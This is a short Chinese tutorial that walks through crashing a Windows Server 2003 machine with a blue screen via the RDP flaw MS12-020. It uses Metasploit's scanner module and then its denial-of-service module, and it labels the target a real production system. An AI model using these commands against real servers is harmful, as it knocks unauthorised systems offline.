Windows远程桌面蓝屏漏洞利用(Metasploit-framework)
实验环境:
kali2017.2(原生) ip:192.168.218.151
windows server 2003(真实生产环境) ip:192.168.218.150
工具:
Metasploit-framework
使用Metasploit-framework进行漏洞利用
漏洞编号为ms12-020
启动控制台msfconsole(启动可能时间稍长)
2. 使用探测模块查找目标是否有此漏洞
use auxiliary/scanner/rdp/ms12_020_check
set RHOSTS 192.168.218.150
run
The target is vulnerable 证明有此漏洞
3. 利用漏洞进行蓝屏攻击
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.218.150
run开始攻击